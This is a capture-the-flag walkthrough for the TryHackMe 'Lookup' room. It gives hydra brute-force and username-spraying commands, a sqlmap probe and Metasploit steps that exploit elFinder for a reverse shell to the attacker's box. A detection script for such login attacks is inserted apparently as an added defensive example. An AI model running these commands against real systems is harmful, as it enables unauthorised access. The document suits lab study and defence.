khelil Cherfi Mohamed Farid


Lookup CTF

An introduction to the Lookup CTF room from TryHackMe (https://tryhackme.com/r/room/lookup).

  1. Scan the IP address with the nmap tool, using the simplest command: nmap <IP-ADD>


  2. We can see that HTTP on port 80 and SSH on port 22 are open, so we check the web page on port 80. We notice that the page redirects us to http://lookup.thm/ and we get this:


Don't panic, it is simple: we just need to map the host name lookup.thm to the IP address. Run sudo nano /etc/hosts and put this line in the file:
10.10.213.56 lookup.thm
Then reload the page http://lookup.thm/ and you should get this page:


  3. We can check for possible SQL injection by running

sqlmap -u "http://lookup.thm/login.php" --data="username=admin&password=test" --batch

but we can't find anything there.

  4. We try brute forcing the login page

by running the command

hydra -l admin -P /usr/share/wordlists/rockyou.txt lookup.thm http-post-form "/login.php:username=^USER^&password=^PASS^:wrong password" -V -I -t 64 -f

This command stops when it finds something.
After some time we find the username and its password:

login: admin
password: password123

But we notice that when we enter the username and the password, we are told they are wrong. So we have to find the right username for the password password123, and we brute force it using

hydra -L /usr/share/wordlists/SecLists/Usernames/Names/names.txt -p password123 lookup.thm http-post-form "/login:username=^USER^&password=^PASS^:F=Invalid login" -V -I -t 64 -f

and we get the new username

login: jose
password: password123

But this time, when we use the new login, it sends us to a new URL (http://files.lookup.thm/), and the page does not load. We have seen this before, so we fix it in the /etc/hosts file, where we have to add

files.lookup.thm

We see that the website is serving its files with elFinder.
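
Seen from the defender's side, the two Hydra runs in this step leave different traces: the first sends many passwords for one account, the second sends one password for many usernames, and it ends in a successful login. The Python below is an added example, not part of the original write-up; the log format, thresholds, addresses and extra usernames are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Hypothetical application auth-log format (an assumption, not from the room):
#   <ISO time> src=<address> user=<name> result=<ok|fail>
LINE = re.compile(r"(\S+) src=(\S+) user=(\S+) result=(ok|fail)")
WINDOW = timedelta(minutes=5)  # look-back window per source address
MAX_FAILS = 10                 # failed logins tolerated per source in a window
MAX_USERS = 5                  # distinct usernames tolerated per source in a window

def detect(lines):
    """Return sorted (source, finding) tuples for guessing, spraying and takeover."""
    recent = defaultdict(list)  # source -> [(time, user)] failures inside WINDOW
    findings = set()
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # not an auth event
        ts, src, user, result = m.groups()
        now = datetime.fromisoformat(ts)
        recent[src] = [(t, u) for t, u in recent[src] if now - t <= WINDOW]
        if result == "fail":
            recent[src].append((now, user))
            if len({u for _, u in recent[src]}) > MAX_USERS:
                findings.add((src, "many usernames tried (spray or enumeration)"))
            elif len(recent[src]) > MAX_FAILS:
                findings.add((src, "repeated password guessing (few accounts)"))
        elif any(s == src for s, _ in findings):
            # A success from a source that was already flagged is the urgent case.
            findings.add((src, f"login succeeded for '{user}' from flagged source"))
    return sorted(findings)

def sample_log():
    """Constructed events: two attack phases from one host, one benign typo."""
    t0 = datetime(2024, 5, 1, 10, 0, 0)
    t1 = t0 + timedelta(minutes=10)
    names = ["aaron", "bella", "carl", "dina", "eli", "fay", "gus"]
    ev = [(t0 + timedelta(seconds=i), "10.10.5.7", "admin", "fail") for i in range(12)]
    ev += [(t1 + timedelta(seconds=i), "10.10.5.7", n, "fail") for i, n in enumerate(names)]
    ev += [(t1 + timedelta(seconds=8), "10.10.5.7", "jose", "ok"),
           (t1 + timedelta(seconds=9), "192.168.1.20", "maria", "fail"),
           (t1 + timedelta(seconds=20), "192.168.1.20", "maria", "ok")]
    return [f"{t.isoformat()} src={s} user={u} result={r}" for t, s, u, r in ev]

if __name__ == "__main__":
    for src, finding in detect(sample_log()):
        print(src, "-", finding)
```

Per-source thresholds like these complement, but do not replace, a login form that returns the same message for an unknown user and a wrong password.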


  5. We start Metasploit with msfconsole -q and search for which elFinder versions are available: search elfinder

We will use the 4th one to get a reverse shell: use 4

  • Configure rhost to the elFinder host from the web page

set rhost files.lookup.thm

  • Configure lhost, which is your AttackBox IP address

set lhost

  • Run it (you can check your config by typing options)

run

shell

If you did everything, you should get a reverse shell like this.

Now you can run python3 -c 'import pty; pty.spawn("/bin/bash")'
